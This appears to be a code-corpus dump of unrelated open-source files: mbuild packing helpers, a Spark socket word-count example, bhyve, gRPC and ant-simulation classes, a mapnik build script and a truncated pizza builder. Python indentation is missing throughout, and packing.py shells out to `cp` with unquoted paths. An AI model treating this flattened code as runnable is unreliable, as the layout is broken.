parts = s.split(',')
if len(parts) != 3:
raise ValueError('exactly three comma-separated values are needed (see help)')
ctype, cmode, addr = parts
connections = {
'basestation': BasestationConnection,
'ext_basestation': ExtBasestationConnection,
'beast': BeastConnection
}
c = connections.get(ctype)
if c is None:
raise ValueError("connection type '{0}' is not supported; options are: '{1}'".format(
ctype, "','".join(connections.keys())))
if cmode == 'listen':
return functools.partial(OutputListener, port=int(addr), connection_factory=c)
elif cmode == 'connect':
return functools.partial(OutputConnector, addr=hostport(addr), connection_factory=c)
else:
raise ValueError("connection mode '{0}' is not supported; options are: 'connect','listen'".format(cmode))
def build_outputs(args):
outputs = []
for s in args.results:
try:
factory = output_factory(s)
except ValueError as e:
log("Warning: Ignoring bad results output option '{0}': {1}",
s, str(e))
continue
try:
output = factory()
except Exception as e:
log("Warning: Could not create results output '{0}': {1}",
s, str(e))
continue
outputs.append(output)
return outputs
def build_receiver_connection(args):
return ReceiverConnection(host=args.input_connect[0],
port=args.input_connect[1],
mode=connection_mode(args))
| gpl-3.0 | 2,082,988,202,807,016,700 | 33.030769 | 113 | 0.604581 | false |
tcmoore3/mbuild | mbuild/packing.py | 1 | 14323 | from __future__ import division
import sys
import os
import tempfile
import warnings
from distutils.spawn import find_executable
from subprocess import Popen, PIPE
import numpy as np
from mbuild.compound import Compound
from mbuild.exceptions import MBuildError
from mbuild.box import Box
from mbuild import clone
__all__ = ['fill_box', 'fill_region', 'solvate']
PACKMOL = find_executable('packmol')
PACKMOL_HEADER = """
tolerance {0:.16f}
filetype pdb
output {1}
seed {2}
"""
PACKMOL_SOLUTE = """
structure {0}
number 1
center
fixed {1:.3f} {2:.3f} {3:.3f} 0. 0. 0.
end structure
"""
PACKMOL_BOX = """
structure {0}
number {1:d}
inside box {2:.3f} {3:.3f} {4:.3f} {5:.3f} {6:.3f} {7:.3f}
end structure
"""
def fill_box(compound, n_compounds=None, box=None, density=None, overlap=0.2,
seed=12345, edge=0.2, compound_ratio=None,
aspect_ratio=None, temp_file=None):
"""Fill a box with a compound using packmol.
Exactly two of `n_compounds`, `box`, and `density` must be specified.
If `n_compounds` and `box` are not None, the specified number of
n_compounds will be inserted into a box of the specified size.
If `n_compounds` and `density` are not None, the corresponding box
size will be calculated internally. In this case, `n_compounds`
must be an int and not a list of int.
If `box` and `density` are not None, the corresponding number of
compounds will be calculated internally.
For the cases in which `box` is not specified but generated internally,
the default behavior is to calculate a cubic box. Optionally,
`aspect_ratio` can be passed to generate a non-cubic box.
Parameters
----------
compound : mb.Compound or list of mb.Compound
Compound or list of compounds to be put in box.
n_compounds : int or list of int
Number of compounds to be put in box.
box : mb.Box
Box to be filled by compounds.
density : float, units kg/m^3, default=None
Target density for the system in macroscale units. If not None, one of
`n_compounds` or `box`, but not both, must be specified.
overlap : float, units nm, default=0.2
Minimum separation between atoms of different molecules.
seed : int, default=12345
Random seed to be passed to PACKMOL.
edge : float, units nm, default=0.2
Buffer at the edge of the box to not place molecules. This is necessary
in some systems because PACKMOL does not account for periodic boundary
conditions in its optimization.
compound_ratio : list, default=None
Ratio of number of each compound to be put in box. Only used in the
case of `density` and `box` having been specified, `n_compounds` not
specified, and more than one `compound`.
aspect_ratio : list of float
If a non-cubic box is desired, the ratio of box lengths in the x, y,
and z directions.
temp_file : str, default=None
File name to write PACKMOL's raw output to.
Returns
-------
filled : mb.Compound
"""
_check_packmol(PACKMOL)
arg_count = 3 - [n_compounds, box, density].count(None)
if arg_count != 2:
msg = ("Exactly 2 of `n_compounds`, `box`, and `density` "
"must be specified. {} were given.".format(arg_count))
raise ValueError(msg)
if box is not None:
box = _validate_box(box)
if not isinstance(compound, (list, set)):
compound = [compound]
if n_compounds is not None and not isinstance(n_compounds, (list, set)):
n_compounds = [n_compounds]
if compound is not None and n_compounds is not None:
if len(compound) != len(n_compounds):
msg = ("`compound` and `n_compounds` must be of equal length.")
raise ValueError(msg)
if density is not None:
if box is None and n_compounds is not None:
total_mass = np.sum([n*np.sum([a.mass for a in c.to_parmed().atoms])
for c,n in zip(compound, n_compounds)])
# Conversion from (amu/(kg/m^3))**(1/3) to nm
L = (total_mass/density)**(1/3)*1.1841763
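# The magic constant 1.1841763 folds the amu->kg and m->nm conversions
# into a single factor: (1.66054e-27)**(1/3) m is about 1.1841763 nm.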
if aspect_ratio is None:
box = _validate_box(Box(3*[L]))
else:
L *= np.prod(aspect_ratio) ** (-1/3)
box = _validate_box(Box([val*L for val in aspect_ratio]))
if n_compounds is None and box is not None:
if len(compound) == 1:
compound_mass = np.sum([a.mass for a in compound[0].to_parmed().atoms])
# Conversion from kg/m^3 / amu * nm^3 to dimensionless units
n_compounds = [int(density/compound_mass*np.prod(box.lengths)*.60224)]
else:
if compound_ratio is None:
msg = ("Determing `n_compounds` from `density` and `box` "
"for systems with more than one compound type requires"
"`compound_ratio`")
raise ValueError(msg)
if len(compound) != len(compound_ratio):
msg = ("Length of `compound_ratio` must equal length of "
"`compound`")
raise ValueError(msg)
prototype_mass = 0
for c, r in zip(compound, compound_ratio):
prototype_mass += r * np.sum([a.mass for a in c.to_parmed().atoms])
# Conversion from kg/m^3 / amu * nm^3 to dimensionless units
n_prototypes = int(density/prototype_mass*np.prod(box.lengths)*.60224)
n_compounds = list()
for c in compound_ratio:
n_compounds.append(int(n_prototypes * c))
# In angstroms for packmol.
box_mins = box.mins * 10
box_maxs = box.maxs * 10
overlap *= 10
# Apply edge buffer
box_maxs -= edge * 10
# Build the input file for each compound and call packmol.
filled_pdb = tempfile.mkstemp(suffix='.pdb')[1]
input_text = PACKMOL_HEADER.format(overlap, filled_pdb, seed)
for comp, m_compounds in zip(compound, n_compounds):
m_compounds = int(m_compounds)
compound_pdb = tempfile.mkstemp(suffix='.pdb')[1]
comp.save(compound_pdb, overwrite=True)
input_text += PACKMOL_BOX.format(compound_pdb, m_compounds,
box_mins[0], box_mins[1], box_mins[2],
box_maxs[0], box_maxs[1], box_maxs[2])
_run_packmol(input_text, filled_pdb, temp_file)
# Create the topology and update the coordinates.
filled = Compound()
for comp, m_compounds in zip(compound, n_compounds):
for _ in range(m_compounds):
filled.add(clone(comp))
filled.update_coordinates(filled_pdb)
filled.periodicity = np.asarray(box.lengths, dtype=np.float32)
return filled
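# Illustrative usage (assumes an mb.Compound such as `water` is available):
#
#     box = Box([3.0, 3.0, 3.0])
#     filled = fill_box(compound=water, n_compounds=500, box=box)
#
# or, deriving the box size from a target density in kg/m^3:
#
#     filled = fill_box(compound=water, n_compounds=500, density=1000)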
def fill_region(compound, n_compounds, region, overlap=0.2,
seed=12345, edge=0.2, temp_file=None):
"""Fill a region of a box with a compound using packmol.
Parameters
----------
compound : mb.Compound or list of mb.Compound
Compound or list of compounds to be put in region.
n_compounds : int or list of int
Number of compounds to be put in region.
region : mb.Box or list of mb.Box
Region to be filled by compounds.
overlap : float, units nm, default=0.2
Minimum separation between atoms of different molecules.
seed : int, default=12345
Random seed to be passed to PACKMOL.
edge : float, units nm, default=0.2
Buffer at the edge of the region to not place molecules. This is
necessary in some systems because PACKMOL does not account for
periodic boundary conditions in its optimization.
temp_file : str, default=None
File name to write PACKMOL's raw output to.
Returns
-------
filled : mb.Compound
If using multiple regions and compounds, the nth value in each list is used in order.
For example, the third compound will be placed in the third region using the third value in n_compounds.
"""
_check_packmol(PACKMOL)
if not isinstance(compound, (list, set)):
compound = [compound]
if not isinstance(n_compounds, (list, set)):
n_compounds = [n_compounds]
if compound is not None and n_compounds is not None:
if len(compound) != len(n_compounds):
msg = ("`compound` and `n_compounds` must be of equal length.")
raise ValueError(msg)
# See if region is a single region or list
if isinstance(region, Box): # Cannot iterate over boxes
region = [region]
elif not any(isinstance(reg, (list, set, Box)) for reg in region):
region = [region]
region = [_validate_box(reg) for reg in region]
# In angstroms for packmol.
overlap *= 10
# Build the input file and call packmol.
filled_pdb = tempfile.mkstemp(suffix='.pdb')[1]
input_text = PACKMOL_HEADER.format(overlap, filled_pdb, seed)
for comp, m_compounds, reg in zip(compound, n_compounds, region):
m_compounds = int(m_compounds)
compound_pdb = tempfile.mkstemp(suffix='.pdb')[1]
comp.save(compound_pdb, overwrite=True)
reg_mins = reg.mins * 10
reg_maxs = reg.maxs * 10
reg_maxs -= edge * 10 # Apply edge buffer
input_text += PACKMOL_BOX.format(compound_pdb, m_compounds,
reg_mins[0], reg_mins[1], reg_mins[2],
reg_maxs[0], reg_maxs[1], reg_maxs[2])
_run_packmol(input_text, filled_pdb, temp_file)
# Create the topology and update the coordinates.
filled = Compound()
for comp, m_compounds in zip(compound, n_compounds):
for _ in range(m_compounds):
filled.add(clone(comp))
filled.update_coordinates(filled_pdb)
return filled
def solvate(solute, solvent, n_solvent, box, overlap=0.2,
seed=12345, edge=0.2, temp_file=None):
"""Solvate a compound in a box of solvent using packmol.
Parameters
----------
solute : mb.Compound
Compound to be placed in a box and solvated.
solvent : mb.Compound
Compound to solvate the box.
n_solvent : int
Number of solvents to be put in box.
box : mb.Box
Box to be filled by compounds.
overlap : float, units nm, default=0.2
Minimum separation between atoms of different molecules.
seed : int, default=12345
Random seed to be passed to PACKMOL.
edge : float, units nm, default=0.2
Buffer at the edge of the box to not place molecules. This is necessary
in some systems because PACKMOL does not account for periodic boundary
conditions in its optimization.
temp_file : str, default=None
File name to write PACKMOL's raw output to.
Returns
-------
solvated : mb.Compound
"""
_check_packmol(PACKMOL)
box = _validate_box(box)
if not isinstance(solvent, (list, set)):
solvent = [solvent]
if not isinstance(n_solvent, (list, set)):
n_solvent = [n_solvent]
if len(solvent) != len(n_solvent):
msg = ("`n_solvent` and `n_solvent` must be of equal length.")
raise ValueError(msg)
# In angstroms for packmol.
box_mins = box.mins * 10
box_maxs = box.maxs * 10
overlap *= 10
center_solute = (box_maxs + box_mins) / 2
# Apply edge buffer
box_maxs -= edge * 10
# Build the input file for each compound and call packmol.
solvated_pdb = tempfile.mkstemp(suffix='.pdb')[1]
solute_pdb = tempfile.mkstemp(suffix='.pdb')[1]
solute.save(solute_pdb, overwrite=True)
input_text = (PACKMOL_HEADER.format(overlap, solvated_pdb, seed) +
PACKMOL_SOLUTE.format(solute_pdb, *center_solute))
for solv, m_solvent in zip(solvent, n_solvent):
m_solvent = int(m_solvent)
solvent_pdb = tempfile.mkstemp(suffix='.pdb')[1]
solv.save(solvent_pdb, overwrite=True)
input_text += PACKMOL_BOX.format(solvent_pdb, m_solvent,
box_mins[0], box_mins[1], box_mins[2],
box_maxs[0], box_maxs[1], box_maxs[2])
_run_packmol(input_text, solvated_pdb, temp_file)
# Create the topology and update the coordinates.
solvated = Compound()
solvated.add(solute)
for solv, m_solvent in zip(solvent, n_solvent):
for _ in range(m_solvent):
solvated.add(clone(solv))
solvated.update_coordinates(solvated_pdb)
return solvated
def _validate_box(box):
if isinstance(box, (list, tuple)):
if len(box) == 3:
box = Box(lengths=box)
elif len(box) == 6:
box = Box(mins=box[:3], maxs=box[3:])
if not isinstance(box, Box):
raise MBuildError('Unknown format for `box` parameter. Must pass a'
' list/tuple of length 3 (box lengths) or length'
' 6 (box mins and maxes) or an mbuild.Box object.')
return box
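# Illustrative behaviour: _validate_box([3, 3, 3]) builds a cubic Box with
# 3 nm edges, _validate_box([0, 0, 0, 3, 4, 5]) builds one from explicit
# mins/maxs, and anything that is not a Box or a 3/6-element sequence
# raises MBuildError.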
def _packmol_error(out, err):
"""Log packmol output to files. """
with open('log.txt', 'w') as log_file, open('err.txt', 'w') as err_file:
log_file.write(out)
err_file.write(err)
raise RuntimeError("PACKMOL failed. See 'err.txt' and 'log.txt'")
def _run_packmol(input_text, filled_pdb, temp_file):
proc = Popen(PACKMOL, stdin=PIPE, stdout=PIPE, stderr=PIPE, universal_newlines=True)
out, err = proc.communicate(input=input_text)
if 'WITHOUT PERFECT PACKING' in out:
msg = ("Packmol finished with imperfect packing. Using "
"the .pdb_FORCED file instead. This may not be a "
"sufficient packing result.")
warnings.warn(msg)
os.system('cp {0}_FORCED {0}'.format(filled_pdb))
if 'ERROR' in out:
_packmol_error(out, err)
if temp_file is not None:
os.system('cp {0} {1}'.format(filled_pdb, os.path.join(temp_file)))
def _check_packmol(PACKMOL):
if not PACKMOL:
msg = "Packmol not found."
if sys.platform.startswith("win"):
msg = (msg + " If packmol is already installed, make sure that the "
"packmol.exe is on the path.")
raise IOError(msg)
| mit | -2,805,964,307,335,604,000 | 36.396867 | 108 | 0.611324 | false |
bravo-zhang/spark | examples/src/main/python/sql/streaming/structured_network_wordcount.py | 51 | 2539 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
r"""
Counts words in UTF8 encoded, '\n' delimited text received from the network.
Usage: structured_network_wordcount.py <hostname> <port>
<hostname> and <port> describe the TCP server that Structured Streaming
would connect to receive data.
To run this on your local machine, you need to first run a Netcat server
`$ nc -lk 9999`
and then run the example
`$ bin/spark-submit examples/src/main/python/sql/streaming/structured_network_wordcount.py
localhost 9999`
"""
from __future__ import print_function
import sys
from pyspark.sql import SparkSession
from pyspark.sql.functions import explode
from pyspark.sql.functions import split
if __name__ == "__main__":
if len(sys.argv) != 3:
print("Usage: structured_network_wordcount.py <hostname> <port>", file=sys.stderr)
sys.exit(-1)
host = sys.argv[1]
port = int(sys.argv[2])
spark = SparkSession\
.builder\
.appName("StructuredNetworkWordCount")\
.getOrCreate()
# Create DataFrame representing the stream of input lines from connection to host:port
lines = spark\
.readStream\
.format('socket')\
.option('host', host)\
.option('port', port)\
.load()
# Split the lines into words
words = lines.select(
# explode turns each item in an array into a separate row
explode(
split(lines.value, ' ')
).alias('word')
)
# Generate running word count
wordCounts = words.groupBy('word').count()
# Start running the query that prints the running counts to the console
query = wordCounts\
.writeStream\
.outputMode('complete')\
.format('console')\
.start()
query.awaitTermination()
| apache-2.0 | 7,066,528,901,242,410,000 | 31.974026 | 94 | 0.686885 | false |
ConnorDillon/bhyve | bhyve/config.py | 1 | 2053 | import os
import copy
from .utils import flatmap
from .serializable import Serializable
from .vm import VM
class Config(Serializable):
def __init__(self, vms):
self.vms = vms
self.file = ''
def add(self, vm):
self.vms[vm.name] = vm
return self
def remove(self, vm_name):
del self.vms[vm_name]
return self
def modify(self, vm):
return self.add(vm)
def get(self, vm_name):
return self.vms[vm_name]
def clone(self, source, name):
vm = copy.deepcopy(self.get(source))
vm.name = name
vm.nmdm_id = self.new_nmdmid()
tapid = self.new_tapid()
for nic in vm.nics:
nic.name = 'tap' + str(tapid)
tapid += 1
cmds = []
for disk in vm.disks:
new_name = disk.name.replace(source, name)
for cmd in disk.clone(new_name):
cmds.append(cmd)
disk.name = new_name
self.add(vm)
return cmds
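    # Illustrative usage (hypothetical file path and VM names):
    #
    #     cfg = Config.open('/usr/local/etc/bhyve/vms.conf')
    #     disk_cmds = cfg.clone('web1', 'web2')  # commands to clone the disks
    #     cfg.save()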
def to_dict(self):
dct = {}
for k, v in self.vms.items():
dct[k] = v.to_dict()
del dct[k]['name']
return dct
@classmethod
def from_dict(cls, dct):
if dct is None:
dct = {}
vms = {}
for k, v in dct.items():
v['name'] = k
vms[k] = VM.from_dict(v)
return cls(vms)
@classmethod
def open(cls, config_file):
if os.path.exists(config_file):
with open(config_file) as cf:
config = cls.load(cf.read())
else:
config = cls.from_dict({})
config.file = config_file
return config
def save(self):
assert self.file
with open(self.file, 'w') as cf:
cf.write(self.dump())
def new_tapid(self):
max_id = max(map(lambda x: int(x.name[3:]), flatmap(lambda x: x.nics, self.vms.values())))
return max_id + 1
def new_nmdmid(self):
return max(vm.nmdm_id for vm in self.vms.values()) + 1 | gpl-3.0 | -4,245,439,619,576,110,600 | 22.883721 | 98 | 0.514856 | false |
greasypizza/grpc | src/python/grpcio/grpc/framework/foundation/logging_pool.py | 6 | 3194 | # Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""A thread pool that logs exceptions raised by tasks executed within it."""
import logging
from concurrent import futures
def _wrap(behavior):
"""Wraps an arbitrary callable behavior in exception-logging."""
def _wrapping(*args, **kwargs):
try:
return behavior(*args, **kwargs)
except Exception as e:
logging.exception(
'Unexpected exception from %s executed in logging pool!',
behavior)
raise
return _wrapping
class _LoggingPool(object):
"""An exception-logging futures.ThreadPoolExecutor-compatible thread pool."""
def __init__(self, backing_pool):
self._backing_pool = backing_pool
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self._backing_pool.shutdown(wait=True)
def submit(self, fn, *args, **kwargs):
return self._backing_pool.submit(_wrap(fn), *args, **kwargs)
def map(self, func, *iterables, **kwargs):
return self._backing_pool.map(_wrap(func),
*iterables,
timeout=kwargs.get('timeout', None))
def shutdown(self, wait=True):
self._backing_pool.shutdown(wait=wait)
def pool(max_workers):
"""Creates a thread pool that logs exceptions raised by the tasks within it.
Args:
max_workers: The maximum number of worker threads to allow the pool.
Returns:
A futures.ThreadPoolExecutor-compatible thread pool that logs exceptions
raised by the tasks executed within it.
"""
return _LoggingPool(futures.ThreadPoolExecutor(max_workers))
| bsd-3-clause | 5,036,194,065,998,722,000 | 36.576471 | 81 | 0.700689 | false |
Antificial/antificial | antificial/framework/world.py | 1 | 13417 | #! /usr/bin/env python
from multiprocessing import Array
import util
from random import randint
from enum import Enum
from framework import PheromoneType
class Field:
def __init__(self, x, y, is_nest, ant_count, home_pheromone_level, food_pheromone_level, player_food_levels):
self.x = x
self.y = y
self.is_nest = is_nest
self.ant_count = ant_count
self.home_pheromone_level = home_pheromone_level
self.food_pheromone_level = food_pheromone_level
self.player_food_levels = player_food_levels
def __str__(self):
output = "["
if self.x < 10:
output += "x: " + str(self.x)
elif self.x < 100:
output += "x: " + str(self.x)
else:
output += "x:" + str(self.x)
output += " "
if self.y < 10:
output += "y: " + str(self.y)
elif self.y < 100:
output += "y: " + str(self.y)
else:
output += "y:" + str(self.y)
if self.is_nest > 0:
output += " N"
if self.ant_count > 0:
output += " A:" + str(self.ant_count)
if self.home_pheromone_level > 0:
output += " H:" + str(self.home_pheromone_level)
if self.food_pheromone_level > 0:
output += " F:" + str(self.food_pheromone_level)
for index in range(len(self.player_food_levels)):
if (self.player_food_levels[index] > 0):
output += " P" + str(index) + ":" + str(self.player_food_levels[index])
output += "]"
return output
def __repr__(self):
return self.__str__()
def __eq__(self, other):
if other is None:
return False
if not isinstance(other, Field):
return False
if self.x != other.x or self.y != other.y:
return False
if self.is_nest != other.is_nest:
return False
if self.ant_count != other.ant_count:
return False
if self.home_pheromone_level != other.home_pheromone_level:
return False
if self.food_pheromone_level != other.food_pheromone_level:
return False
if len(self.player_food_levels) != len(other.player_food_levels):
return False
for index in range(len(self.player_food_levels)):
if self.player_food_levels[index] != other.player_food_levels[index]:
return False
return True
class World:
def __init__(self, grid_resolution, player_count):
self.width = grid_resolution[0]
self.height = grid_resolution[1]
self.player_count = player_count
# keep track of the food coordinates (x, y, player_no) to make the updates easier
self.food_coordinates = []
"""Amount of integers per coordinate:
1 to flag the nest (values: 0 - 1)
1 for the ant count (values: 0 - max int)
1 for home pheromone level (values: 0 - 100)
1 for food pheromone level (values: 0 - 100)
1 food flag / level per player (values: 0 - 1)
"""
self.ints_per_coordinate = 4 + self.player_count
# index (position) of integers
self.nest_index = 0
self.ant_count_index = 1
self.home_pheromone_index = 2
self.food_pheromone_index = 3
self.player_food_indexes = range(4, 4 + self.player_count)
self.array_size = self.width * self.height * self.ints_per_coordinate
self.data = Array('i', [0 for i in range(self.array_size)], lock=False)
def get(self, x, y):
if not self.is_valid_coordinate(x, y):
return None
begin_index = self.get_field_begin_index(x, y)
is_nest = self.data[begin_index + self.nest_index]
ant_count = self.data[begin_index + self.ant_count_index]
home_pheromone_level = self.data[begin_index + self.home_pheromone_index]
food_pheromone_level = self.data[begin_index + self.food_pheromone_index]
player_food_levels = []
for food_index in self.player_food_indexes:
player_food_levels.append(self.data[begin_index + food_index])
field = Field(x, y, is_nest, ant_count, home_pheromone_level, food_pheromone_level, player_food_levels)
return field
def set(self, field):
if (not isinstance(field, Field)):
return False
if not self.is_valid_coordinate(field.x, field.y):
return False
if (len(field.player_food_levels) != self.player_count):
return False
begin_index = self.get_field_begin_index(field.x, field.y)
self.data[begin_index + self.nest_index] = field.is_nest
self.data[begin_index + self.ant_count_index] = field.ant_count
self.data[begin_index + self.home_pheromone_index] = field.home_pheromone_level
self.data[begin_index + self.food_pheromone_index] = field.food_pheromone_level
for player_no in range(self.player_count):
food_index = self.player_food_indexes[player_no]
self.data[begin_index + food_index] = field.player_food_levels[player_no]
if field.player_food_levels[player_no] > 0:
self.food_coordinates.append([field.x, field.y, player_no])
return True
def reset(self):
self.food_coordinates = []
for index in range(self.array_size):
self.data[index] = 0
"""Creates a matrix of fields depending on the smell_range.
Borders are represented as "None".
Examples:
smell_range = 1 -> result = [
[Field, Field, Field],
[Field, AntF., Field],
[Field, Field, Field]
]
smell_range = 2 -> result = [
[Field, Field, Field, Field, Field],
[Field, Field, Field, Field, Field],
[Field, Field, AntF., Field, Field],
[Field, Field, Field, Field, Field],
[Field, Field, Field, Field, Field]
]
smell_range = 3 -> result = [
[Field, Field, Field, Field, Field, Field, Field],
[Field, Field, Field, Field, Field, Field, Field],
[Field, Field, Field, Field, Field, Field, Field],
[Field, Field, Field, AntF., Field, Field, Field],
[Field, Field, Field, Field, Field, Field, Field],
[Field, Field, Field, Field, Field, Field, Field],
[Field, Field, Field, Field, Field, Field, Field]
]
"""
def get_neighbours(self, x, y, smell_range = 1):
if not self.is_valid_coordinate(x, y):
return None
if smell_range < 1:
return None
# be careful: min and max values can and will be outside of our coordinate system
min_x = x - smell_range
min_y = y - smell_range
max_x = x + smell_range
max_y = y + smell_range
neighbours_width = 1 + (2 * smell_range)
result = [[None for y in range(neighbours_width)] for x in range(neighbours_width)]
for current_x in range(min_x, max_x + 1):
if current_x < 0 or current_x >= self.width:
continue
for current_y in range(min_y, max_y + 1):
if current_y < 0 or current_y >= self.height:
continue
result[current_x - min_x][current_y - min_y] = self.get(current_x, current_y)
return result
def deposit_pheromone(self, x, y, pheromone_type, pheromone_strength):
if not self.is_valid_coordinate(x, y):
return False
if pheromone_strength < 0:
return False
begin_index = self.get_field_begin_index(x, y)
if pheromone_type == PheromoneType.HOME:
current_level = self.data[begin_index + self.home_pheromone_index]
new_level = current_level + pheromone_strength
if new_level > 255:
new_level = 255
self.data[begin_index + self.home_pheromone_index] = new_level
elif pheromone_type == PheromoneType.FOOD:
current_level = self.data[begin_index + self.food_pheromone_index]
new_level = current_level + pheromone_strength
if new_level > 255:
new_level = 255
self.data[begin_index + self.food_pheromone_index] = new_level
else:
return False
return True
def decay_pheromones(self, home_pheromone_decay_rate = 8, food_pheromone_decay_rate = 8):
if home_pheromone_decay_rate < 0:
return False
if food_pheromone_decay_rate < 0:
return False
for x in range(self.width):
for y in range(self.height):
begin_index = self.get_field_begin_index(x, y)
# update home pheromone level
current_level = self.data[begin_index + self.home_pheromone_index]
if current_level > 0:
updated_level = current_level - home_pheromone_decay_rate
if updated_level < 0:
updated_level = 0
self.data[begin_index + self.home_pheromone_index] = updated_level
# update food pheromone level
current_level = self.data[begin_index + self.food_pheromone_index]
if current_level > 0:
updated_level = current_level - food_pheromone_decay_rate
if updated_level < 0:
updated_level = 0
self.data[begin_index + self.food_pheromone_index] = updated_level
return True
    # TODO: replace x and y with Ant / Field objects?
def move_ant(self, source_x, source_y, destination_x, destination_y):
if not self.is_valid_coordinate(source_x, source_y):
return False
if not self.is_valid_coordinate(destination_x, destination_y):
return False
if source_x == destination_x and source_y == destination_y:
return True
# decrease ant count in source field
source_begin_index = self.get_field_begin_index(source_x, source_y)
ant_count = self.data[source_begin_index + self.ant_count_index]
if ant_count > 0:
self.data[source_begin_index + self.ant_count_index] = ant_count - 1
# increase ant count in destination field
destination_begin_index = self.get_field_begin_index(destination_x, destination_y)
ant_count = self.data[destination_begin_index + self.ant_count_index]
self.data[destination_begin_index + self.ant_count_index] = ant_count + 1
return True
def update_food(self, new_food_coordinates):
# remove old food levels
for (x, y, player_no) in self.food_coordinates:
if not self.is_valid_coordinate(x, y):
continue
begin_index = self.get_field_begin_index(x, y)
food_index = self.player_food_indexes[player_no]
self.data[begin_index + food_index] = 0
# set new food levels
self.food_coordinates = new_food_coordinates
for (x, y, player_no) in new_food_coordinates:
if not self.is_valid_coordinate(x, y):
continue
begin_index = self.get_field_begin_index(x, y)
food_index = self.player_food_indexes[player_no]
self.data[begin_index + food_index] = 255
def set_home(self, x, y):
begin_index = self.get_field_begin_index(x, y)
self.data[begin_index + self.nest_index] = 1
def get_field_begin_index(self, x, y):
if not self.is_valid_coordinate(x, y):
return None
return (x + (y * self.width)) * self.ints_per_coordinate
def is_valid_coordinate(self, x, y):
if x < 0 or x >= self.width:
return False
if y < 0 or y >= self.height:
return False
return True
def iprint(self):
util.iprint("[World] width: {self.width}")
util.iprint("[World] height: {self.height}")
util.iprint("[World] player_count: {self.player_count}")
util.iprint("[World] ints_per_coordinate: {self.ints_per_coordinate}")
util.iprint("[World] nest_index: {self.nest_index}")
util.iprint("[World] ant_count_index: {self.ant_count_index}")
util.iprint("[World] home_pheromone_index: {self.home_pheromone_index}")
util.iprint("[World] food_pheromone_index: {self.food_pheromone_index}")
util.iprint("[World] player_food_indexes: {self.player_food_indexes}")
util.iprint("[World] data:")
output = ""
for x in range(self.width):
for y in range(self.height):
field = self.get(x, y)
output += str(field)
output += "\n"
util.iprint(output) | mit | -591,269,150,169,951,500 | 36.066298 | 113 | 0.548036 | false |
strk/mapnik | tests/cpp_tests/build.py | 2 | 1430 | import os
import glob
from copy import copy
Import ('env')
test_env = env.Clone()
test_env['LIBS'] = copy(env['LIBMAPNIK_LIBS'])
test_env.AppendUnique(LIBS='mapnik')
test_env.AppendUnique(LIBS='sqlite3')
test_env.AppendUnique(CXXFLAGS='-g')
for cpp_test in glob.glob('*_test.cpp'):
name = cpp_test.replace('.cpp','-bin')
source_files = [cpp_test]
test_program = None
if 'agg_blend_src_over_test' in cpp_test:
# customization here for faster compile
agg_env = Environment(ENV=os.environ)
agg_env['CXX'] = env['CXX']
agg_env['CXXFLAGS'] = env['CXXFLAGS']
if 'agg' in test_env['LIBS']:
agg_env.AppendUnique(LIBS='agg')
agg_env.Append(CPPPATH = '#deps/agg/include')
agg_env.Append(LIBPATH = '#deps/agg')
agg_env['CPPPATH'] = ['#deps/agg/include',env['BOOST_INCLUDES']]
test_program = agg_env.Program(name, source=source_files, LINKFLAGS=env['CUSTOM_LDFLAGS'])
else:
test_env_local = test_env.Clone()
if 'csv_parse' in cpp_test:
source_files += glob.glob('../../plugins/input/csv/' + '*.cpp')
test_program = test_env_local.Program(name, source=source_files, LINKFLAGS=env['CUSTOM_LDFLAGS'])
Depends(test_program, env.subst('../../src/%s' % env['MAPNIK_LIB_NAME']))
# build locally if installing
if 'install' in COMMAND_LINE_TARGETS:
env.Alias('install',test_program)
| lgpl-2.1 | -877,316,198,166,355,200 | 37.648649 | 105 | 0.625175 | false |
AnhellO/DAS_Sistemas | Ago-Dic-2020/rodriguez-martinez-jesus-angel/primer-parcial/builder.py | 1 | 1125 | # Abstract Building
class Pizza:
def __init__(self, inches):
self.ingredients = ["salsa de tomate", "queso"]
self.inches = inches
def __str__(self):
message = f'Mi pizza es de {self.inches}" con los siguientes ingredientes: ' + ', '.join(self.ingredients)
# Replace the last comma with "y"
last_comma = message.rfind(",")
return message[:last_comma] + " y" + message[last_comma+1:]
# Builder.
class PizzaBuilder:
def __init__(self, inches: int):
self.pizza = Pizza(inches)
def addCheese(self):
self.pizza.ingredients.append('doble queso')
return self
def addPepperoni(self):
self.pizza.ingredients.append('pepperoni')
return self
def addSalami(self):
self.pizza.ingredients.append('salami')
return self
def addPimientos(self):
self.pizza.ingredients.append('pimientos')
return self
def addCebolla(self):
self.pizza.ingredients.append('cebolla')
return self
def addChampiñones(self):
self.pizza.ingredients.append('champiñones')
